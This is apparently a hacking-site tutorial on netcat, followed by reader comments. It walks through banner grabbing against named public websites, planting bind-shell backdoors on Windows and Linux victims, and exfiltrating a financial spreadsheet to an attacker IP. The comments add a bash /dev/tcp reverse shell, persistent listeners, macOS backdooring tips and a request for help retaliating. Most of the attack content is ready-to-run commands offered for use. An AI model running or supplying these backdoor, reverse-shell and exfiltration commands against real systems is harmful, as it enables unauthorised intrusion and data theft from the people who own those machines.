Hack Like a Pro: How to Use Netcat, the Swiss Army Knife of Hacking Tools

How to Use Netcat, the Swiss Army Knife of Hacking Tools

Hack Like a Pro: How to Use Netcat, the Swiss Army Knife of Hacking Tools

Welcome back, my greenhorn hackers!

For over 15 years, a tiny but powerful tool has been used by hackers for a wide-range of activities. This tool goes by the name of netcat, and although well known in hacking circles, it's virtually unknown outside. It's so powerful and useful, that many people within the hacking community refer to it as the "Swiss Army knife of hacking tools."

In this tutorial, we'll look at the capabilities of this simple tool and how the aspiring hacker can use it.

What Is Netcat, Really?

Netcat—like so many hacker tools—was created to be a network analysis tool. Developed by a fellow only known as "Hobbit," he gave away this tool to the IT community without compensation, but has received scores of accolades. Thanks, Hobbit!

As such, you can use it to open up TCP and UDP connections between two machines over any port your heart desires. It can also be used as a port scanning tool, similar to nmap. In addition, it can be used for port forwarding, proxying, simple web server, and leaving an open backdoor for the hacker.

Let's look at some of those capabilities using our BackTrack system.

Step 1: Open Netcat

Once we've fired up our BackTrack system and opened a terminal, we can use netcat from any directory since it's located in our bin directory which is in our PATH variable, by default. So, let's type:

  • nc -h

As you can see, the basic syntax for netcat is the following.

To connect to another machine:

  • nc options host IP address port

To listen for inbound connections:

  • nc -l -p port

Step 2: Use Netcat to Connect to a Remote System

Let's use netcat to connect to a remote system. In this case, we will try to connect to a web server on port 80. We type:

  • nc 192.168.1.105 80

This gives us a TCP connection, by default, to the web server (port 80) at 192.168.1.105. Now, whatever we type, we will be sent directly to the web server when we hit enter.

Step 3: Use Netcat to Banner Grab for OS Fingerprinting

Once we have a TCP connection to a web server, we can use netcat to grab the banner of the web server to identify what web serving software the victim is running.

Remember that before attacking any system, we need to know as much as possible about the victim. Netcat can help us with that task by grabbing the banners that web servers serve up to new connections.

Now that we have a connection, we can do the banner grab to the web server by typing:

  • HEAD / HTTP/1.0

Be careful and copy exactly as I typed it with the slashes and spaces.

Hit enter a few times and the web server will respond with its banner telling us exactly what software it is running. In this case, we can see that the web server is running Microsoft's IIS 6.0.

We can use this technique on other public websites, as well. Let's try it on some widely known web sites and see what web server software they're running . First, let's try this website, wonderhowto.com. When we ping wonderhowto.com, we see that the IP address is 98.129.110.26. So, we can then type:

  • nc 98.129.110.26 80

After getting a connection, we can grab the web server banner by typing:

  • HEAD / HTTP/1.0

And then hitting enter two or three times.

As we can see, wonderhowto.com is running Microsoft-IIS/7.5.

If we try the same thing with cnn.com, we get the results below.

Interestingly, cnn.com is running nginx, an open source web server that in a very short amount of time has equaled the total number of Microsoft IIS installations globally (Apache is still over 60% of the web servers on the planet).

Go ahead and try it on other websites and find out what server they're running.

Step 4: Use Netcat to Listen for Connections

Now, let's use netcat to create a listener on the remote system. Let's assume that we have a Windows server that we have installed netcat on. We can now type the following to open a netcat listener on port 6996 (it can be any port) on that system.

  • nc - l -p 6996

This has created a "listener" that we can connect to at our leisure. Note that on Windows systems, we can run this same command with an upper case L and it will create a persistent listener that will open up even if the system is rebooted.

Step 5: Create a Backdoor

Now let's create a backdoor on the victim system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.

For Windows we use:

  • nc -l -p 6996 -e cmd.exe

For Linux we use;

  • nc -l -p 6996 -e /bin/bash

This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. Then on our attacking system, we type:

  • nc 192.168.1.105 6996

As you can see, the Windows command prompt has been piped through our netcat connection directly to our attacking system! We own that box!

Step 6: Copy Files Out (Exfiltrate) from the Target

Netcat can also be used to exfiltrate files and data from the victim. Let's imagine that there's data on the victim system that we want. Maybe financial data or data stored in a database. We can use a stealth connection to slowly copy that data out to our attack system. In this example, we will exfiltrate a file called financialprojections.xls, presumably an Excel file with financial projections.

From the source system, we type:

  • type financialprojections.xls | nc 192.168.1.104 6996

This command says, display the file financialprojections.xls and then pipe (|) it to netcat (nc) to IP address 192.168.1.104 through port 6996.

From the destination system we type:

  • nc -l -p 6996 > financialprojections.xls

This command says create a listener (l) on port (p) 6996 and then send the data received on this listener to a file named financialprojections.xls.

We can see in the screenshot below that the file was copied across our netcat connection over port 6996 to our attacking machine!

This is just a small sample of what this powerful little program can do. When you combine it with some basic scripting skills, you can only imagine the incredible things we can do!

In futures tutorials, we will look at other ways that this powerful, little tool can help astute hackers, so keep coming back!

Original tech cat image via Shutterstock

31 Comments

Does this file transfer and everything only work if you have netcat installed on the remote computer? If so, how could you get it to install and then interact with it without using physical access, is there like a payload for it or something?

this is just nc..the question is..im at home..and want to get on a computer miles away but I cant break into the house..so how are you going to get nc on their machine?..so I could do this...(not that im doing this..its an analogy)..Thanks

Eight:

Good question! If you don't have physical access, you will need to upload it the system. TFTP would be one option. If you were able to get a command prompt through Metasploit, you can upload netcat by TFTP.

OTW

Hi OTW,

Kindly advice on how i can use the set-cookie:79.............path=/, httponly

i have researched with no explicit clarification given.

Regards
evil genious

Evil:

I'm not sure what you are asking me and what this has to do with this tutorial on netcat?

OTW

OTW

I understand how XSS work, when I used Netcat as described on this tutorial I happened to have come across this:

Set-Cookie: 79eE........................................................; path=/; HttpOnly
Connection; close

during my research on httponly cookies i know that they are the best in terms of security configuration (to avoid xss). So if I manage to get the above are they the cookies for the administrator or they are part of the configuration to throw testers away ?

I didnt want to try them since I am not a cracker.

evilgenious

Great writeup! Now to poke at your brain (in hopes of being pointed in the right direction) ;)

1) After netcat is installed as a backdoor on a system, how would a pentester configure the netcat backdoor to be used as a socks proxy?

2) Is it possible to chain netcat proxies together to use in succession?

3) If it's not possible to chain netcat proxies together through it's own internal configs, could they be chained together using proxychains?

(I have a gut feeling that both scenario's are possible).

4) Assuming that netcat can be chained,, would the same configuration work in cryptcat?

Thank you in advanced!

yes, this can be done, but there are easier ways.

What would be an easier way?

Carlos, you might want to check out Socat. It's essentially netcat with a bunch of added crypto/tunneling gear.

I'd like to share that it is possible to get net cat working on Mac OSX too.

Though the default command "nc" emulates the legit netcat, the "-e" option is not available, so practically useless for backdooring.

This can be easily solved installing it from "Homebrew".
Go to "brew.sh" and follow the instruction to install the terminal utility, once done "brew install netcat".
Now you can run "netcat -l -p 1337 -e /bin/bash" and you'll get a shell on that system too.
It worked perfectly for me, but since there's no https or certs, feel free to not trust this.

hhello sir OTW...is it possible to see the source code of netcat directly on kali? on a more general note..is it possible to see the source code of installed tools or programs on a linux distros? if so how? thanks

King:

Nearly everything on our Kali platform is open source, including the Debian Linux it is built on.

OTW

that has been understood...but assuming am without internet can i see the source code directly somewhere in the OS?

doing for example i cd to usr/bin and i try gedit netcat or some other tool..but nothing shows up..well those a files to be executed but what about wanting to read the source assuming am without internet?

is that possible? hope i explained myself enought
thanks Sir.

Those files are already compiled. You need the uncompiled files to view the source code.

OTW, I keep trying to use netcat to connect to the ftp server of some websites, like cnn, and things like that. I type HEAD / HTTP/1.O and nothing comes up. Am I doing something wrong?

Nevermind. I just have bad wifi.

how to i know what is my friends computer port?

For the linux bash shell we use: bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
to send a connection, what about windows command shell ?? help me here ...!

You create a listener in Windows with nc -L -p <port number> -e cmd.exe

so it must have netcat ? no other way ?

Sadly, Windows doesn't come with much useful cli tools .. you can download netcat here and most others here.

I'm sure there are other ways, but this article is about using netcat.

I am a newbie and love the knowledge shared here on this site. I need help with an issue that I have had happen similar to this current hack but it was done to me on my rooted Samsung galaxy s4. Any advice or suggestions on how to retaliate or something? Thanks

Would it be possible to upload a meterpreter payload to a nc listener, and if so how. I tried a few things and it spewed out jibberish... Thanks

Robyn

OTW, how would you make this connection persistent on a Linux server?

I guess this can easily be achieved with nohup

what is the difference between ncat and netcat ??
ncat -h giving me different parameters as compared to netcat-h

Please Help out me to clear out my concept! Thank-you! Else your tutorial is as always super awesome! Thank-you Master OTW for sharing such useful informations!

Mine one more doubt is, can we transfer .exe file through ncat ????

When i get Netcat installed on a target system, what are my options from there? Can I open a meterpreter session through this ?

Share Your Thoughts

  • Hot
  • Latest